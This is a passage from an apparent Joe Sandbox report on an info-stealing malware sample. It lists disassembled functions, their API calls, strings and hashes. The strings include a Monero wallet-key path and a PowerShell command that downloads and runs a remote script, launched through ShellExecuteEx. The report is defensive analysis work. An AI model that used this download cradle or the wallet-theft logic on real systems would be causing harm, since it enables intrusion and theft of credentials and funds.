                                      • Opcode ID: 5eee0816a72f9e5e433311a03a49c1250925279dee930b022f97b28b7580ee2e
                                      • Instruction ID: 82eb35eac2ae964bea432fbc2a991f048a4e5233c56865736641e12ab05ed1f0
                                      • Opcode Fuzzy Hash: 5eee0816a72f9e5e433311a03a49c1250925279dee930b022f97b28b7580ee2e
                                      • Instruction Fuzzy Hash: CA014475E44305FBE714EBD4ED49FAD77B8EB44700F104064F6159A284D6709980DB90
                                      Function 00F278B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F278C4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F278CB
                                      • RegOpenKeyExA.ADVAPI32(80000002,01D7C400,00000000,00020119,00F27849), ref: 00F278EB
                                      • RegQueryValueExA.ADVAPI32(00F27849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00F2790A
                                      • RegCloseKey.ADVAPI32(00F27849), ref: 00F27914
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: c7b9c1b83fe31c5bd7cd8f9cac632070b27a524980a2e6093b9c0ee31768ec1d
                                      • Instruction ID: 84d262adbbc86ee4b27a95f4aa4d3d0b3ef86c100010634978dfa1c5471b25f8
                                      • Opcode Fuzzy Hash: c7b9c1b83fe31c5bd7cd8f9cac632070b27a524980a2e6093b9c0ee31768ec1d
                                      • Instruction Fuzzy Hash: DA0167B5E40309BFEB14DBD4DC4AFAE77B8EB04700F004594F615AB284DB749A40DB90
                                      Function 00F24300 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00F24325
                                      • RegOpenKeyExA.ADVAPI32(80000001,01D8D8A0,00000000,00020119,?), ref: 00F24344
                                      • RegQueryValueExA.ADVAPI32(?,01D8E308,00000000,00000000,00000000,000000FF), ref: 00F24368
                                      • RegCloseKey.ADVAPI32(?), ref: 00F24372
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F24397
                                      • lstrcat.KERNEL32(?,01D8E2F0), ref: 00F243AB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$CloseOpenQueryValuememset
                                      • String ID:
                                      • API String ID: 2623679115-0
                                      • Opcode ID: 07da22401f551350e07874dd9826c0094edf77a195c423c617e7f74177b3b942
                                      • Instruction ID: d4f8b57709a642ad783025cd06e5abe0584c37731498304cc401a8546ecdb913
                                      • Opcode Fuzzy Hash: 07da22401f551350e07874dd9826c0094edf77a195c423c617e7f74177b3b942
                                      • Instruction Fuzzy Hash: 1441F8B29001086BDB28EBE0EC56FEE737DBB98300F404568B7254A0C5EF745AC88BD1
                                      Function 00F1A110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F1A13C
                                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F1A161
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00F1A181
                                      • ReadFile.KERNEL32(000000FF,?,00000000,00F1148F,00000000), ref: 00F1A1AA
                                      • LocalFree.KERNEL32(00F1148F), ref: 00F1A1E0
                                      • CloseHandle.KERNEL32(000000FF), ref: 00F1A1EA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: 078eeeb1e73997d729f3108911cb1184afb53b977ce374633ab81d95209124c1
                                      • Instruction ID: aed26db1f956d1260d63e7d6e7cd22920bd3cc510c00df64d7a1831dff8178c0
                                      • Opcode Fuzzy Hash: 078eeeb1e73997d729f3108911cb1184afb53b977ce374633ab81d95209124c1
                                      • Instruction Fuzzy Hash: B431FAB4E01209EFDB14CFA4D885BEE7BB5AB48714F108158E911AB284D774AA81DFA1
                                      Function 00F2CB7E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: String___crt$Typememset
                                      • String ID:
                                      • API String ID: 3530896902-3916222277
                                      • Opcode ID: 20ec48164897fed65ca9e557834b4572bb96ffe6cfa5f3139a98ad85e4d5a720
                                      • Instruction ID: 0a72705e6dff1589aa37388067c4f7d03dcccb2f221de133d3577eb2724c447f
                                      • Opcode Fuzzy Hash: 20ec48164897fed65ca9e557834b4572bb96ffe6cfa5f3139a98ad85e4d5a720
                                      • Instruction Fuzzy Hash: FF41F6B15007AC5EDB318B24AC85FFF7BE8AB45704F1444E8E98A97182D2719A44EFA0
                                      Function 00F249D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrcat.KERNEL32(?,01D8E398), ref: 00F24A2B
                                        • Part of subcall function 00F28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F28F9B
                                      • lstrcat.KERNEL32(?,00000000), ref: 00F24A51
                                      • lstrcat.KERNEL32(?,?), ref: 00F24A70
                                      • lstrcat.KERNEL32(?,?), ref: 00F24A84
                                      • lstrcat.KERNEL32(?,01D7B8D8), ref: 00F24A97
                                      • lstrcat.KERNEL32(?,?), ref: 00F24AAB
                                      • lstrcat.KERNEL32(?,01D8D800), ref: 00F24ABF
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F28F20: GetFileAttributesA.KERNEL32(00000000,?,00F11B94,?,?,00F3577C,?,?,00F30E22), ref: 00F28F2F
                                        • Part of subcall function 00F247C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00F247D0
                                        • Part of subcall function 00F247C0: RtlAllocateHeap.NTDLL(00000000), ref: 00F247D7
                                        • Part of subcall function 00F247C0: wsprintfA.USER32 ref: 00F247F6
                                        • Part of subcall function 00F247C0: FindFirstFileA.KERNEL32(?,?), ref: 00F2480D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                      • String ID:
                                      • API String ID: 2540262943-0
                                      • Opcode ID: 9dbc2d9943dc8eb26bf090e49357f6a6914326b7f2990019763a1c3185da7510
                                      • Instruction ID: 6d3e3214620e09005a8bfc81277123ce74fda668e8ab1618ae3fdd1886dff6f3
                                      • Opcode Fuzzy Hash: 9dbc2d9943dc8eb26bf090e49357f6a6914326b7f2990019763a1c3185da7510
                                      • Instruction Fuzzy Hash: 093182B290021867DB28EBF0EC85EDD737CAB98700F404599F21596089EF78A7C9DF94
                                      Function 00F22EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F2AA50: lstrcpy.KERNEL32(00F30E1A,00000000), ref: 00F2AA98
                                        • Part of subcall function 00F2ACC0: lstrlen.KERNEL32(?,01D89018,?,\Monero\wallet.keys,00F30E1A), ref: 00F2ACD5
                                        • Part of subcall function 00F2ACC0: lstrcpy.KERNEL32(00000000), ref: 00F2AD14
                                        • Part of subcall function 00F2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00F2AD22
                                        • Part of subcall function 00F2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00F2AC82
                                        • Part of subcall function 00F2AC30: lstrcat.KERNEL32(00000000), ref: 00F2AC92
                                        • Part of subcall function 00F2ABB0: lstrcpy.KERNEL32(?,00F30E1A), ref: 00F2AC15
                                      • ShellExecuteEx.SHELL32(0000003C), ref: 00F22FD5
                                      Strings
                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00F22F54
                                      • ')", xrefs: 00F22F03
                                      • <, xrefs: 00F22F89
                                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00F22F14
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      • API String ID: 3031569214-898575020
                                      • Opcode ID: 9e05004cce6d5b704e8a83d48068d2873e1a556c3aaaf071da2bc15a8773e005
                                      • Instruction ID: 7f8fc7720d689c0f9943b8baa95d4f378861e46114c78f0398c1ed2f574184e0
                                      • Opcode Fuzzy Hash: 9e05004cce6d5b704e8a83d48068d2873e1a556c3aaaf071da2bc15a8773e005
                                      • Instruction Fuzzy Hash: 22411D71D002289BDB15EFA0ECA2FEDBB79AF50304F404459E00677192DF786A49DF92
                                      Function 00F8CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: dllmain_raw$dllmain_crt_dispatch
                                      • String ID:
                                      • API String ID: 3136044242-0
                                      • Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction ID: e385cefbd0fd0c8738a11dc664a451301f0efc6fd873575cafcad4e074ee7d76
                                      • Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
                                      • Instruction Fuzzy Hash: 07219272E00698AFDB21BF55CC41AEF3A79EB82BA4F054115F90967211C3344D41ABF0
                                      Function 00F27F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F27FC7
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F27FCE
                                      • RegOpenKeyExA.ADVAPI32(80000002,01D7C390,00000000,00020119,?), ref: 00F27FEE
                                      • RegQueryValueExA.ADVAPI32(?,01D8D720,00000000,00000000,000000FF,000000FF), ref: 00F2800F
                                      • RegCloseKey.ADVAPI32(?), ref: 00F28022
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID:
                                      • API String ID: 3225020163-0
                                      • Opcode ID: 0d40c9a4f8f38e9f6830501a19f326e48d0e6de9bd00a46c1a40c13f9b83d39b
                                      • Instruction ID: f07dfc2a823b6d08f935413c2a4f72698980910da88e38625141bb81b56dab01
                                      • Opcode Fuzzy Hash: 0d40c9a4f8f38e9f6830501a19f326e48d0e6de9bd00a46c1a40c13f9b83d39b
                                      • Instruction Fuzzy Hash: B2118FB2A40216EBE714CBC4ED45F7BBBB8EB04B10F104129F621AB284D77558409BA1
                                      Function 00F293F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • StrStrA.SHLWAPI(01D8DEE8,00000000,00000000,?,00F19F71,00000000,01D8DEE8,00000000), ref: 00F293FC
                                      • lstrcpyn.KERNEL32(011E7580,01D8DEE8,01D8DEE8,?,00F19F71,00000000,01D8DEE8), ref: 00F29420
                                      • lstrlen.KERNEL32(00000000,?,00F19F71,00000000,01D8DEE8), ref: 00F29437
                                      • wsprintfA.USER32 ref: 00F29457
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000148C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000149A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731240000.000000000149B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1731353046.0000000001638000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_f10000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: cdebc0be9f486573d2e31e86e35ee8182c5ae9fcc681300062564fb1b915975d
                                      • Instruction ID: 323095cbdb5e532b42ad952792e288c88b3006321488395906236a2aada7f7b9
                                      • Opcode Fuzzy Hash: cdebc0be9f486573d2e31e86e35ee8182c5ae9fcc681300062564fb1b915975d
                                      • Instruction Fuzzy Hash: 60010C76500248FFEB08DFE8D948AAE7BB9EF48314F108258F9199B244D731EA40DBD0
                                      Function 00F112A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00F112B4
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00F112BB
                                      • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00F112D7
                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00F112F5
                                      • RegCloseKey.ADVAPI32(?), ref: 00F112FF
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1730708792.0000000000F11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F10000, based on PE: true
                                      • Associated: 00000000.00000002.1730675267.0000000000F10000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000104D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.0000000001059000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730708792.00000000011E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.00000000011FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001384000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.000000000145D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1730933907.0000000001482000.00000040.00000001.01000000.00000003.sdmpDownload File
